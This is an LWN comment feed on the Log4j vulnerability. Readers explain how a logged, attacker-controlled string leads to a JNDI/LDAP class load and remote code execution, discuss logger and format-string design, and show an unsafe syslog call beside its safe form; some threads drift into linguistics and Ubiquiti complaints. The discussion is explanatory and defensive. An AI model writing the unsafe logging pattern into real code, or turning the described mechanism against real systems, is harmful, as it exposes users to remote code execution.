LWN: Comments on "The Log4j mess" https://lwn.net/Articles/878390/ This is a special feed containing comments posted to the individual LWN article titled "The Log4j mess". en-us Thu, 16 Oct 2025 09:06:27 +0000 Thu, 16 Oct 2025 09:06:27 +0000 https://www.rssboard.org/rss-specification lwn@lwn.net The Log4j mess https://lwn.net/Articles/881441/ https://lwn.net/Articles/881441/ mathstuf <div class="FormattedComment"> <font class="QuotedText">&gt; I pronounce it Jillingham, which is the gramatically correct way? The i softens the g?</font><br> <p> I don&#x27;t think that&#x27;s any hard and fast rule. Take &quot;gill&quot; (as in fish breathing organs) for example. I&#x27;m American, but I&#x27;d pronounce that with a hard &quot;g&quot; without any other guidance.<br> </div> Sat, 15 Jan 2022 01:45:23 +0000 The Log4j mess https://lwn.net/Articles/881433/ https://lwn.net/Articles/881433/ Wol <div class="FormattedComment"> That&#x27;s fine until you get conflicting rules in different dialects. I&#x27;ve just got used to it ...<br> <p> And then you get wonders like &quot;how do you pronounce Gillingham?&quot; Where the correct answer is &quot;What county are you in?&quot;. I pronounce it Jillingham, which is the gramatically correct way? The i softens the g? The way of the Men of Kent? (No, Kentish Men don&#x27;t live in Gillingham.)<br> <p> And then I went to Somerset, where they pronounce it G&#x27;illingham, like Google Maps. Very confusing :-)<br> <p> My daughter&#x27;s now a Yorkshire lass with Geordie in-laws. That gets well weird ...<br> <p> Give up. English is a STRANGE language (and that&#x27;s *before* the Americans started messing with it :-)<br> <p> Cheers,<br> Wol<br> </div> Fri, 14 Jan 2022 21:40:06 +0000 The Log4j mess https://lwn.net/Articles/881421/ https://lwn.net/Articles/881421/ mathstuf <div class="FormattedComment"> <font class="QuotedText">&gt; Bear in mind languages re-program the brain.</font><br> <p> I don&#x27;t believe the Sapir-Whorf hypothesis has been proven enough to state it with such conviction. At least this sounds like the strong version (whereas the weaker version where it merely *influences* is much better supported).<br> <p> <font class="QuotedText">&gt; Someone else has already mentioned tonal languages.</font><br> <p> English has tones. Not in the same way as Chinese or Telugu, but it&#x27;s there. Just as an example, verbal sarcasm is (usually) expressed through tonality. Take &quot;yeah, right&quot; (agreement) and &quot;yeah…right&quot; (doubt) when said verbally. The only difference is tone and timing. English also has tones associated with questions and interrogatory statements (try asking questions flatly or adding a rising tone to the end of sentences). The tonality is more on the level of sentences rather than on syllables, but I don&#x27;t think anyone can say with conviction that English is completely atonal and therefore is not something completely alien to English speakers. It&#x27;s just used differently (with a higher level of importance).<br> <p> FWIW, Hindi has aspiration on basically every consonant sound which makes it different (and therefore changes the word). It is *very* hard for me to make some of them as it just doesn&#x27;t feel natural and I feel like I&#x27;m making a separate &quot;h&quot; sound, but I (think I) am getting better at hearing them. I suspect it is similar for the English l/r distinction that is difficult for native speakers of some languages. Rolling or trilling r sounds is also something I have just not been able to master either. Tones in other languages feel more like this to me than something impossible.<br> </div> Fri, 14 Jan 2022 17:24:07 +0000 The Log4j mess https://lwn.net/Articles/881418/ https://lwn.net/Articles/881418/ nix <div class="FormattedComment"> <font class="QuotedText">&gt; But even just French and English - French has a bunch of rules about where and how to stress the syllables. English doesn&#x27;t.</font><br> <p> Yes it does. It just has different rules (it&#x27;s incredibly hard to understand mis-stressed English and sometimes it can be incomprehensible or change the meaning entirely, just as in French). What English has mostly lost is the need for endings of, well, almost anything but pronouns to agree in number, case etc (an ancient feature present in almost all other PIE-descended languages).<br> </div> Fri, 14 Jan 2022 16:48:45 +0000 The Log4j mess https://lwn.net/Articles/881413/ https://lwn.net/Articles/881413/ Wol <div class="FormattedComment"> Bear in mind languages re-program the brain. Someone else has already mentioned tonal languages.<br> <p> But even just French and English - French has a bunch of rules about where and how to stress the syllables. English doesn&#x27;t. So as an English speaker when somebody talks to me with a different stress pattern I take it in my stride. But if I spoke French with an English stress pattern, a Frenchman would find it much harder to understand than if I spoke with a French stress pattern, despite being the EXACT SAME syllables (or rather not, as consonants migrate freely between English syllables).<br> <p> If your brain is programmed to recognise one class of languages, it is very difficult to be competent in a different class. And even multi-lingual kids - a study of children with one French and one English parent found that all the kids fell on one side or the other of this divide, and it clearly affected their choice of favourite language, even if they were perfect in the other.<br> <p> Cheers,<br> Wol<br> </div> Fri, 14 Jan 2022 16:36:33 +0000 The Log4j mess https://lwn.net/Articles/881411/ https://lwn.net/Articles/881411/ nix <div class="FormattedComment"> <font class="QuotedText">&gt; In short, if you can write well using computer languages, you should be able to learn to write well using English (as most programming languages use English) and your native language if it is not English, and you should be able to learn another natural language without too much difficulty</font><br> <p> Oh yes, because natural languages and computer languages have exactly the same level of complexity. Oh wait no, natural languages are orders of magnitude more complex and vary along many more dimensions, with much less obvious internal coherence (the only actual rule is &quot;must be an attractor in the space of languages instantiated by the learning systems in toddlers&#x27; heads when iterated for many generations&quot;, and nobody even knows how those incredible pieces of neural machinery work or what they do, or even the space of languages they could in theory produce or the dimensions along which those languages might vary). This couldn&#x27;t be more different from how computer languages are designed. Really, most computer languages are so similar to each other (compared to the variability we see in natural languages) that it would be close to the truth to call them all very strange, restricted dialects of (mostly) English.<br> <p> Everyone who is neurologically normal can learn at least one spoken language in the critical window in childhood. Not everyone can learn more outside that time, no matter how hard they try, and even those who do are very rarely as good at is as native speakers who learned in that window. And computer languages are textual, and that&#x27;s not a language at all: it&#x27;s a technological *encoding* of a language. Languages are spoken things (or, for the deaf, serially-visually-encoded things quite unlike any form of writing, processed using astonishingly similar machinery to the machinery used to process auditory language, often ending up using the exact same brain regions, repurposed bits of auditory cortex!). There is no spoken form of any computer language I am aware of: IMHO this alone is enough to disqualify them all as being remotely similar to natural languages.<br> </div> Fri, 14 Jan 2022 16:18:26 +0000 The Log4j mess https://lwn.net/Articles/880213/ https://lwn.net/Articles/880213/ immibis <div class="FormattedComment"> It&#x27;s C. What kind of value is format going to return?<br> </div> Mon, 03 Jan 2022 12:24:24 +0000 The Log4j mess https://lwn.net/Articles/879252/ https://lwn.net/Articles/879252/ jezuch <div class="FormattedComment"> In short: performance. You don&#x27;t want to pay the price of formatting the message if it isn&#x27;t going to be used because (for example) the log is of too low priority (generally you want to have lots of DEBUG logs which are turned off by default - making this cheap is important) (making it convenient is also important - you could check each time if the log level is enabled, but it&#x27;s extremely annoying and ugly as hell)<br> <p> So in effect the modern logging frameworks take the format string and arguments instead of pre-formatted message, and some static analysis tool will scream at you if you don&#x27;t use them.<br> </div> Mon, 20 Dec 2021 17:50:21 +0000 The Log4j mess https://lwn.net/Articles/879046/ https://lwn.net/Articles/879046/ ianmcc <div class="FormattedComment"> Why do interpolation at the same time as writing to the log? Wouldn&#x27;t it be more sensible to separate out those tasks and if you want interpolation then spell it like syslog(LOG_INFO, format(&quot;%s&quot;, attacker_controlled_msg)) ? (Yes its too late for syslog(3), but in new code....)<br> </div> Fri, 17 Dec 2021 16:55:41 +0000 The Log4j mess https://lwn.net/Articles/878907/ https://lwn.net/Articles/878907/ khim <p>Similarity between programming languages and natural languages is quite real but irrelevant.</p> <p>“Programming” humans and programming computers are two radically different skill sets. That's why good managers are rarely good programmers and good programmers are rarely good managers.</p> <p>Difference lies not in the languages used, but in the difference between computer and human. And <b>that</b> one is huge.</p> <p>Humans have common sense yet couldn't keep in mind even dozen entities simultaneously. Computers have no common sense but could easily deal with millions and billions of entities.</p> <p>This makes an art of making computer do what you need radically different from doing the same to a human. With computer there are no need to persuade anyone to do anything or keep anyone engaged or interested — but you have to handle corner-cases or else you would be in trouble. With humans you can rely on the fact that most corner cases would be noticed and fixed automatically but need to somehow convince someone to accept your “program”.</p> <p>Consider lawyers (who are, arguably, closest to “human programmers”) vs programmers. What would programmer do when faced with the need to verify program? Test corner cases first. If program works fine there, then chances are high it would work fine everywhere. What lawyer does when faced with the need to interpret the law? Tries to move as far from corner cases as possible: you can never be sure how judge would interpret corner cases thus spending time on them is pointless, better to look for a way to resolve the case <b>without</b> touching any corner cases, even remotely.</p> <p>And if you would try to use human languages like a programming language (and following <a href="https://en.wikipedia.org/wiki/Don%27t_repeat_yourself">DRY principle</a>, trying to avoid text duplication and so on is the best way to create something which noone, not even other programmer, would be able to understand.</p> <p>Because with computers you try to avoid duplication but for human-readable text it's important to do just the opposite: talk about the same thing from many different approaches in the hope that reader would be able to understand and accept at least one of them.</p> Thu, 16 Dec 2021 19:11:30 +0000 The Log4j mess https://lwn.net/Articles/878904/ https://lwn.net/Articles/878904/ fest3er <div class="FormattedComment"> Alas, coders, programmers and software engineers will never produce quality documentation until teachers/instructors/professors learn to teach natural languages (English, Korean, Chinese, Russian, Italian, Bantu, et alia) as *programming* languages. Because that is what they are. Consider: as I type this response, I am attempting to code a program that, when you later read it, will program *your* neural nets to think what I am thinking.<br> <p> I see little reason for any software engineer to be unable to code good, clear documentation. Programming is programming; natural languages and computer languages all demand rigorous attention to details in order to avoid errors. In short, if you can write well using computer languages, you should be able to learn to write well using English (as most programming languages use English) and your native language if it is not English, and you should be able to learn another natural language without too much difficulty.<br> <p> All languages are programming languages and should be be taught as such. But I digress.<br> </div> Thu, 16 Dec 2021 18:49:50 +0000 Apache Log4j https://lwn.net/Articles/878814/ https://lwn.net/Articles/878814/ nim-nim <div class="FormattedComment"> It’s not a problem in the Open Source part, it’s a generic problem in *Enterprise* software.<br> <p> In *Enterprise* software the interactions between participants are mediated by contracts and licenses that effectively prevent fixing software the natural way. Thus the main “feature” of Enterprise software is inventing setups that allow executing new code without invoquing past contracts.<br> <p> As the commit that added the problemaic feature to Log4j states, its for the “convenience” of not changing things were they belong, stupid.<br> <p> Java and the Apache foundation (that is mostly Enterprise-oriented Java software, despite using a non-Java software front) were the poster child of this kind of development process. They were and are deeply hostile to free sofware because you just don’t fix things upstream, you find ways to workaround locally using things like JNDI or its modern equivalents. Of course they’ve lost a lot of their shine in the past years now that someone needs to process the accrued technical debt (besides the inefficiencies crushed the ecosystem, with a single remaining vendor for Hadoop &amp; friends).<br> <p> And if you think non-Open-Source Java development is any different than the one you see Apache foundation side I have prime real estate on the moon to sell you.<br> <p> (the static linking/containerish guys are mostly the same crowd using new languages to make the same mistakes, in a decade or so they’ll be all over CERT bulletins fixing the technical debt they’re bosy creating right now).<br> <p> </div> Thu, 16 Dec 2021 09:07:54 +0000 The Log4j mess https://lwn.net/Articles/878776/ https://lwn.net/Articles/878776/ NYKevin <div class="FormattedComment"> Note that vfprintf() takes a va_list, not an array. You cannot dynamically allocate and initialize va_list objects (at least, using standard portable C, anyway), so even vfprintf() does not actually support this use case in a reasonable fashion (because there would be no way to dynamically determine the arity at runtime). As I briefly alluded to, you can use va_arg (not va_copy, although that does preserve the truncation) to shorten a va_list by truncating elements from left to right, which in theory could be used to build a va_list of fixed (statically determined) types and with a static maximum arity, but that&#x27;s not really adequate for the general case. This is what I mean by &quot;C variadics are terrible.&quot;<br> </div> Wed, 15 Dec 2021 20:09:52 +0000 The Log4j mess https://lwn.net/Articles/878754/ https://lwn.net/Articles/878754/ dskoll <p>I don't think the third case is worth supporting for a logger, but if someone wants to, then the logical name would be <tt>vsyslogf()</tt>, analogous to <tt>vfprintf()</tt>. <p>My point is that the name <tt>syslog</tt> doesn't alert a programmer to the fact that the function takes printf-like format strings, whereas <tt>syslogf</tt> is more likely to. Wed, 15 Dec 2021 17:43:10 +0000 The Log4j mess https://lwn.net/Articles/878709/ https://lwn.net/Articles/878709/ smurf <div class="FormattedComment"> which is why I only use Ubiquity hardware which can be (and in fact is, five minutes after unboxing) reflashed to run OpenWRT.<br> </div> Wed, 15 Dec 2021 09:05:21 +0000 The Log4j mess https://lwn.net/Articles/878695/ https://lwn.net/Articles/878695/ NYKevin <div class="FormattedComment"> I would go further. IMHO there are basically two cases:<br> <p> 1. You need interpolation. Then there should actually be at least one string interpolation command somewhere in the format string, and so you need at least two arguments (the format string and whatever argument the first interpolation takes).<br> 2. You don&#x27;t need interpolation. Then you should either be writing printf(&quot;%s&quot;, x) (or whatever printf-like function you&#x27;re calling instead of printf), or you should be using a convenience wrapper that does that for you. Therefore, you *still* need at least two arguments to printf.<br> <p> If those two cases were the only two cases that we cared about, then we could just ban one-argument printf (and printf-likes) altogether (e.g. using a lint rule).<br> <p> Unfortunately, there&#x27;s a third case:<br> <p> 3. You are dynamically building a format string which may or may not actually contain any interpolation commands.<br> <p> You could keep track of whether you&#x27;ve added an interpolation as you build the string, and then select case (1) or case (2) at runtime. On first blush, this looks like needless and pedantic bookkeeping, but as it turns out, C variadics are so bad that you already have to do that anyway (or something just as verbose and ugly, involving a partial va_copy of an existing va_list, such that the copy can dynamically be empty or non-empty). So case (3) basically doesn&#x27;t exist, unless you are working in an environment or language where variadics are not C-like, at which point you can probably do runtime checking of whether the number of arguments passed matches up with the number implied by the format string.<br> <p> The only exception to this would be if your API takes a format string and a C array, but no size argument. Such APIs have never been typical for printf-like functions, because the caller would have to allocate and initialize an array, take pointers to all of the arguments, cast everything into pointer-to-void, etc. and nobody wants to do that just to print a string. So I&#x27;m perfectly happy to declare that case as &quot;You made the weird API, now you get to live with its shortcomings.&quot;<br> </div> Tue, 14 Dec 2021 23:43:34 +0000 The Log4j mess https://lwn.net/Articles/878677/ https://lwn.net/Articles/878677/ nix <div class="FormattedComment"> Original UAP. Four bricking incidents in the last two years, all thank god recoverable via TFTP. Three incidents of major functionality breakage like completely fubaring broadcasts. Not one fix reported in the horrible excuse for changelogs they emit these days. I don&#x27;t upgrade the firmware any more, and since two controller updates led to UAPs that were no longer adoptable I don&#x27;t upgrade the controller any more either.<br> <p> Ubiquiti has *really* gone downhill -- and that&#x27;s before we discovered that the head of cloud there was an extortionist who got his position by basically lying nonstop to the (apparently clueless) CEO and terrifying him and who then proceeded to try to extort money out of his employer and possibly (? it remains unclear) actually was the source of a credentials compromise: he was also said to be so unpleasant to work with that he was a major reason why most of the competent developers Ubiquiti employed reportedly left, leaving their software development in a seriously parlous state.<br> <p> Ubiquiti have been very hot on trying to do absolutely all their admin via cloudy stuff, which was extremely questionable in any case for *networking* gear, i.e. the stuff which needs to be properly configured if you&#x27;re to get to the cloud in the first place -- but now that it turns out that the head cloudy guy was *this* sort of person, one wonders if the whole thing was encouraged in the first place specifically to get lots of juicy credentials from lots of people.<br> </div> Tue, 14 Dec 2021 21:12:02 +0000 The Log4j mess https://lwn.net/Articles/878608/ https://lwn.net/Articles/878608/ khim <p>Various estimated put number of software engineers in US <a href="https://www.daxx.com/blog/development-trends/number-software-developers-world">somewhere between 2 million and 4 million</a>.</p> <p>That's around 1% of population. Which means that the 5% which may grasp the required knowledge naturally is, probably, enough: if ¼ or ⅕ would pick software engineering as their life goal we would have about 1% of population. But if we would take 5% from 5% (by adding the requirement to be proficient in another, significantly different area) then we would arrive at around 0.25% which is significantly lower than 1%. And some of them may want to do something else than programming, you know.</p> <p>IOW: there are no excuse for the bazillions of Java programmers which copy-paste code from StackOverflow without understanding what they are doing, but asking the programmers to learn to write good literature on top of writing good code would be too much.</p> <p>Maybe we may organize things differently and then 0.05% of population would be enough… but that would require entirely different organization of society and we have no idea if such society is possible at all.</p> Tue, 14 Dec 2021 15:28:33 +0000 The Log4j mess https://lwn.net/Articles/878604/ https://lwn.net/Articles/878604/ mathstuf <div class="FormattedComment"> <font class="QuotedText">&gt; Sorry, we need more than one coder per thousand (or ten thousand?) of people.</font><br> <p> Hmm. This certainly warrants a citation. If you&#x27;re referring to &quot;societal demand&quot; kind of &quot;need&quot;, sure. But I&#x27;m not sure that turns into anything other than &quot;the market will fulfill demand&quot; with the normal head-in-the-sand behaviors to externalities if there&#x27;s not some kind of guiding regulation (IMO, another &quot;societal demand&quot; kind of &quot;need&quot;).<br> </div> Tue, 14 Dec 2021 13:52:39 +0000 The Log4j mess https://lwn.net/Articles/878603/ https://lwn.net/Articles/878603/ dskoll <p>Yes, it was a real WTF of a design error. Even venerable old syslog(3) has been abused due to the naivety of programmers who write: <p><tt>&#160;&#160;&#160;syslog(LOG_INFO, attacker_controlled_msg);</tt> <p>instead of: <p><tt>&#160;&#160;&#160;syslog(LOG_INFO, "%s", attacker_controlled_msg);</tt> <p>If I could go back in time, I'd redesign syslog(3) to take only a single string argument that is logged verbatim, and add a new syslogf(3) function that does implements the formatted version. Tue, 14 Dec 2021 13:52:31 +0000 The Log4j mess https://lwn.net/Articles/878600/ https://lwn.net/Articles/878600/ khim <font class="QuotedText">&gt; Maybe Knuth had a point with his whole “literate programming” thing after all :)</font> <p>Wouldn't work. It's slow, but, more importantly, for it to work you need someone who may write good code <b>and</b> good documentation.</p> <p>It's hard enough to find one who may do good job for one of these things. But to find someone who may do these two different things? Simultaneously?</p> <p>Sorry, we need more than one coder per thousand (or ten thousand?) of people.</p> Tue, 14 Dec 2021 13:23:40 +0000 The Log4j mess https://lwn.net/Articles/878599/ https://lwn.net/Articles/878599/ nye <div class="FormattedComment"> What devices do you use where this has been a problem? For me, the only issue I&#x27;ve ever had with updating the controller and firmware was when I had to switch my inform URL to non-HTTPS temporarily, to get out of a circular problem where I couldn&#x27;t update my USG firmware to a version that would support the new style letsencrypt certificates. Other than that&#x27;s it&#x27;s been bulletproof for me.<br> <p> I&#x27;m using a USG and some UAC-AC-PROs, so I&#x27;m interested in seeing what hardware I should avoid buying in the future!<br> </div> Tue, 14 Dec 2021 12:48:14 +0000 Apache Log4j https://lwn.net/Articles/878596/ https://lwn.net/Articles/878596/ smurf <div class="FormattedComment"> <font class="QuotedText">&gt; including Responsible Oversight which ensures problems like this don&#x27;t happen</font><br> <p> Excuse me while I fall off my chair, laughing madly.<br> <p> This would be slightly more believable if a wet fart of the money the Apache Foundation rakes in every year actually went to the people responsible for maintaining all that software under its umbrella. Particularly when it&#x27;s a central piece of infrastructure.<br> <p> Well … apparently it was not possible to learn anything from the openssl mess. So we have to repeat it. (Only worse.)<br> <p> </div> Tue, 14 Dec 2021 10:19:56 +0000 The Log4j mess https://lwn.net/Articles/878595/ https://lwn.net/Articles/878595/ smurf <div class="FormattedComment"> <font class="QuotedText">&gt; Sure, but the client could do that themselves.</font><br> <p> But that would … umm … require actual coding?<br> <p> Given that Java devolved into a language of which 90% (personal and admittedly biased impression) consists of mostly-copied-from-stackoverflow boilerplate for iterator classes and instance-building classes and whatnot *plus* its own built-in scripting language (it&#x27;s too difficult to hook anything sane into the JVM, so …), most Java coders won&#x27;t be able to get that right.<br> <p> So instead of a sane approach, which would have required an entirely new heap of class scaffolding just for the ability to pass a look-something-up object to the logger, they opted to do string interpolation. Of random data from outside. Patently stupid but let&#x27;s face it the first step towards a _really_ sane solution involves &quot;use a sensible language dammit&quot;.<br> </div> Tue, 14 Dec 2021 10:11:54 +0000 Apache Log4j https://lwn.net/Articles/878594/ https://lwn.net/Articles/878594/ taladar <div class="FormattedComment"> I think the problem is largely that Java Open Source projects and Enterprise Open Source projects in general are often the result of unbearable pain at some employer that people then fix by writing some library in their free time because their employer is too cheap to do it properly on the clock. Obviously that same Enterprise employer is then also too cheap to pay for maintenance of the code. At some point the good programmer leaves the bad employer and has no need for the code any more so it goes unmaintained, especially for boring solutions to boring problems written in boring languages.<br> </div> Tue, 14 Dec 2021 09:35:34 +0000 The Log4j mess https://lwn.net/Articles/878587/ https://lwn.net/Articles/878587/ Cyberax <div class="FormattedComment"> <font class="QuotedText">&gt; 2. Log4j uses some JNDI and LDAP magic to convert this URI into a Class&lt;T&gt; object, or something which at least vaguely resembles a Class&lt;T&gt; object. In so doing, it downloads the class definition from an attacker-controlled server.</font><br> <p> Close. LDAP in Java has support for class loading, which was earlier (in the time of Java 1.2!) used to load type information data for things like custom exceptions or custom types. Doc: <a href="https://docs.oracle.com/en/middleware/idm/internet-directory/12.2.1.4/development/oracle/ldap/util/LDAPClassLoader.html">https://docs.oracle.com/en/middleware/idm/internet-direct...</a><br> <p> LDAP is not the only vector that can be used to exploit this. RMI (Remote Method Invocation) is just as potent but is a bit harder to set up.<br> <p> <font class="QuotedText">&gt; 3. Log4j then uses reflection to call some method on that Class&lt;T&gt; (or whatever it is), which causes attacker-controlled code to be executed.</font><br> It actually doesn&#x27;t use it for anything, but simply loading the class is enough (static initializers can run arbitrary code).<br> <p> </div> Tue, 14 Dec 2021 08:26:36 +0000 The Log4j mess https://lwn.net/Articles/878586/ https://lwn.net/Articles/878586/ NYKevin <div class="FormattedComment"> <font class="QuotedText">&gt; There&#x27;s no arbitrary lookup at runtime.</font><br> <p> To my understanding, the way this CVE has been publicly described is (roughly) as follows:<br> <p> 0. A vulnerable implementation logs a user-provided string.<br> 1. The string contains a URI.<br> 2. Log4j uses some JNDI and LDAP magic to convert this URI into a Class&lt;T&gt; object, or something which at least vaguely resembles a Class&lt;T&gt; object. In so doing, it downloads the class definition from an attacker-controlled server.<br> 3. Log4j then uses reflection to call some method on that Class&lt;T&gt; (or whatever it is), which causes attacker-controlled code to be executed.<br> <p> I call step (2) &quot;arbitrary class lookups at runtime.&quot; What do you call it, or is my understanding of this security vulnerability completely incorrect?<br> </div> Tue, 14 Dec 2021 08:12:46 +0000 The Log4j mess https://lwn.net/Articles/878583/ https://lwn.net/Articles/878583/ rodgerd <div class="FormattedComment"> Time to bust this baby out again: <a rel="nofollow" href="https://www.youtube.com/watch?v=kjZHjvrAS74">https://www.youtube.com/watch?v=kjZHjvrAS74</a><br> </div> Tue, 14 Dec 2021 03:27:17 +0000 The Log4j mess https://lwn.net/Articles/878571/ https://lwn.net/Articles/878571/ sjj <div class="FormattedComment"> I&#x27;ve used this as the first code line.<br> <p> set -efu -o pipefail<br> </div> Mon, 13 Dec 2021 23:24:56 +0000 The Log4j mess https://lwn.net/Articles/878572/ https://lwn.net/Articles/878572/ camhusmj38 <div class="FormattedComment"> Thanks for sharing this. It was very useful<br> </div> Mon, 13 Dec 2021 23:24:07 +0000 The Log4j mess https://lwn.net/Articles/878568/ https://lwn.net/Articles/878568/ bartoc <div class="FormattedComment"> I’m a C++ library implementer, so implementing these kinds of standards is my job<br> <p> they do become clearer I guess, but many bugs still don&#x27;t show up until you have actually gone to write the first implementation. A technical standard with zero implementations is a very different beast than one with one implementation, and thats different from one with multiple independent implementations. <br> <p> Theres a reason the C++ committee likes to standardize existing libraries, and even then the resulting specification usually contains many bugs found only during implementation. <br> <p> In any event I think going to a formal standardization model would be a very expensive way to resolve this, and if nobody else is going to implement the thing then you could just as well spend the time writing documentation for the current behavior (which is what a standard with one implementation written after the fact by that implementations authors is going to be in any case). Improving the documentation outside any formal process is probably better bang for the buck. <br> <p> Maybe Knuth had a point with his whole “literate programming” thing after all :)<br> </div> Mon, 13 Dec 2021 22:27:02 +0000 The Log4j mess https://lwn.net/Articles/878567/ https://lwn.net/Articles/878567/ Cyberax <div class="FormattedComment"> That&#x27;s pretty much what happened. Except that the JNDI lookup code was added to the default set of plugins.<br> <p> Here&#x27;s the patch: <a href="https://issues.apache.org/jira/secure/attachment/12592850/jndi-lookup-plugin.patch">https://issues.apache.org/jira/secure/attachment/12592850...</a> - note the plugin set in the beginning.<br> <p> <font class="QuotedText">&gt; My argument here is that the vast majority of the time, you don&#x27;t actually need to do arbitrary class lookups at runtime. </font><br> <p> There&#x27;s no arbitrary lookup at runtime. E.g. you can&#x27;t do something like &quot;${nodejs:script}&quot; and expect the JVM to dynamically class-load NodeJS.<br> <p> The problem is in the JNDI implementation, it can be used to load arbitrary code. This is arguably a bad design in the first place, though.<br> </div> Mon, 13 Dec 2021 22:14:57 +0000 The Log4j mess https://lwn.net/Articles/878566/ https://lwn.net/Articles/878566/ khim <font class="QuotedText">&gt; when you consider that Java was originally designed to force programmers to use OOP whether they like it or not.</font> <p>This may have been <b>the original intent</b>, but Java, eventually, became a language who's true strength lies in the ability to use programmers who don't know anything about OOP or even programming in general and program by copy-pasting snippets from Stack Overflow randomly till tests pass.</p> <p>Of course when language started adding features which are easy to abuse that fact become exposed.</p> <p>But it's not if Java programmers understood what they are doing and why before introduction of Streams.</p> Mon, 13 Dec 2021 21:42:45 +0000 The Log4j mess https://lwn.net/Articles/878561/ https://lwn.net/Articles/878561/ NYKevin <div class="FormattedComment"> <font class="QuotedText">&gt; you don&#x27;t override XYZ</font><br> <p> s/XYZ/formatCustomReference/<br> </div> Mon, 13 Dec 2021 19:05:25 +0000 The Log4j mess https://lwn.net/Articles/878550/ https://lwn.net/Articles/878550/ NYKevin <div class="FormattedComment"> <font class="QuotedText">&gt; Second is using JNDI lookups in the format string. Format strings are typically not controlled by attackers and there&#x27;s no reason for the library author to be too concerned about supporting JNDI.</font><br> <p> Sure, but the client could do that themselves. For example (and I&#x27;m just making this syntax up, it could obviously be more elaborate if necessary), Log4j could say &quot;If the format string contains a substring of the form {custom:foo}, we will call the formatCustomReference() method [or whatever they decide to name it] and pass the string &#x27;foo&#x27; as the only argument, then replace {custom:foo} with whatever that method returns.&quot; Then, *if you want JNDI lookups*, you override the method with code that does a JNDI lookup (or call their convenience method/use their pre-written class which does that for you). If you don&#x27;t want JNDI lookups, you don&#x27;t override XYZ, and the default implementation either returns the string unchanged, or throws.<br> <p> My argument here is that the vast majority of the time, you don&#x27;t actually need to do arbitrary class lookups at runtime. Often, you just want some random little bit of state that happens to be inconvenient to pass directly into the logging call... so you can pull it out of some kind of context class or something like that. JNDI is basically reflection, and it should be a last resort, not the default way of solving the &quot;I need to run some code&quot; problem.<br> <p> See also: <a href="http://thecodelesscode.com/case/97">http://thecodelesscode.com/case/97</a><br> </div> Mon, 13 Dec 2021 17:23:45 +0000 The Log4j mess https://lwn.net/Articles/878522/ https://lwn.net/Articles/878522/ epa <div class="FormattedComment"> It&#x27;s a characteristic weakness of open source, community-driven projects to make everything customizable, configurable, and dynamic. And this episode shows one advantage of crusty, rule-bound standards committees. If you have to write a formal specification of the behaviour, so that a new implementation could be written to the spec, design flaws become clearer. &quot;First the following patterns in the string are expanded. Then the result of that expansion is taken as a new string to be expanded, using these different patterns... oh hang on...&quot;<br> </div> Mon, 13 Dec 2021 16:14:41 +0000 The Log4j mess https://lwn.net/Articles/878456/ https://lwn.net/Articles/878456/ NYKevin <div class="FormattedComment"> <font class="QuotedText">&gt; On top, I think we ought to look at the wider culture around Enterprise Java (as I understand it) that uses a lot of instantaneous point-of-use anonymous functions in the Java 8 streams modality. This means programmers are trained away from instantiating and using items outside an anonymous lambda on composed object methods, so being able to log some data might just in-line process user-/attacker-supplied input.</font><br> <p> In other words: Java (or &quot;Enterprise Java&quot; if you prefer) has successfully ship-of-Theseus&#x27;d itself into a language whose programmers don&#x27;t know OOP. That&#x27;s a startling outcome of this whole streams business, when you consider that Java was originally designed to force programmers to use OOP whether they like it or not.<br> </div> Mon, 13 Dec 2021 15:41:52 +0000 The Log4j mess https://lwn.net/Articles/878448/ https://lwn.net/Articles/878448/ nix <div class="FormattedComment"> Oh great! This means I can fix my unifi controller without being forced to upgrade it (in the last few years, every single controller or firmware update from unifi has broken something: small if you&#x27;re lucky, total-bricking if you&#x27;re not).<br> <p> The right thing to do is decommission all my unifi stuff so I can stop running this horrible controller, but I&#x27;ve been putting that off for years... and at least this means people can&#x27;t own my machines by just getting the controller to log something (which is amazingly easy for a remote attacker to do -- say, from outside the house).<br> </div> Mon, 13 Dec 2021 14:20:17 +0000 The Log4j mess https://lwn.net/Articles/878438/ https://lwn.net/Articles/878438/ Cyberax <div class="FormattedComment"> The problem is that people involved hadn&#x27;t understood that connecting two seemingly unrelated features might result in a disaster.<br> <p> First, the JNDI lookup causing class loading is fine, it&#x27;s typically used in enterprise networks to connect clients to an application server (typically over a trusted network) or to do service discovery within the application environment. These days we would think about man-in-the-middle pretending to be the app server and injecting malicious payload, but people were not considering this back then.<br> <p> Second is using JNDI lookups in the format string. Format strings are typically not controlled by attackers and there&#x27;s no reason for the library author to be too concerned about supporting JNDI.<br> <p> And the third is using that with raw log messages.<br> <p> A typical Swiss cheese model of a disaster.<br> </div> Mon, 13 Dec 2021 11:42:10 +0000 The Log4j mess https://lwn.net/Articles/878437/ https://lwn.net/Articles/878437/ k3ninho <div class="FormattedComment"> <font class="QuotedText">&gt;[S]ome people wouldn&#x27;t even call it a design pattern because it&#x27;s &quot;too obvious.&quot;</font><br> From the test side, &#x27;obvious&#x27; is one of my trigger words. &#x27;Should&#x27; is considered harmful; common sense is not so common.<br> <p> It is worth making a habit of overstating safe and diligent behaviour, here calling out the options for logging: don&#x27;t consume user/attacker input without putting it in a security zone; don&#x27;t call out to the network without know what you&#x27;re calling out to the network for; build your string before publishing it; ideally only use printf-type string substitution when logging. You don&#x27;t need recursive descent or a state machine and it&#x27;s a security hole waiting to happen if your logger is functionally a Turing-Complete Domain-Specific Language.<br> <p> On top, I think we ought to look at the wider culture around Enterprise Java (as I understand it) that uses a lot of instantaneous point-of-use anonymous functions in the Java 8 streams modality. This means programmers are trained away from instantiating and using items outside an anonymous lambda on composed object methods, so being able to log some data might just in-line process user-/attacker-supplied input.<br> <p> K3n.<br> </div> Mon, 13 Dec 2021 11:15:16 +0000